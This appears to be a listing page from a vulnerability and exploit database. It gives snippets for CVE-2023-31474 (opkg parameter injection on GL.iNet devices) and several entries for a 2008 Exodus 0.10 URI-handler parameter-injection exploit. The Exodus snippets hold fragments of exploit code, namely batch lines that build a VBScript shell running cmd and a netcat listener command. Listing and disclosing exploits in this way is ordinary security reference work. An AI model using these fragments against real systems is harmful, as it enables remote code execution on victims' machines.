CVE-2023-31474

An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to inject arbitrary parameters in a request to cause opkg to obtain a list of files in a specific directory, by using the regex feature in a package name...

CVE-2023-31474

GL.iNet devices before 3.216 are affected by CVE-2023-31474 due to a flaw in the software installation feature that lets an attacker inject arbitrary parameters via a regex in a package name, causing opkg to list files in a target directory. The issue stems from how package-name regex handling ca...

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit

No description provided by source. !-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders oh rgod... Firstly run netcat in listen mode to drop the vbscript shell run this...

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)

Exodus 0.10 - URI Handler Arbitrary Parameter Injection 2 testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit

Exploit for unknown platform in category remote exploits =============================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Exploit =============================================================== testfile echo Dim wshShell testfile echo Set...

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)

testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...

Exodus v0.10 uri handler arbitrary parameter injection

-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...

Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)

-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability

Exploit for unknown platform in category remote exploits ===================================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability =====================================================================...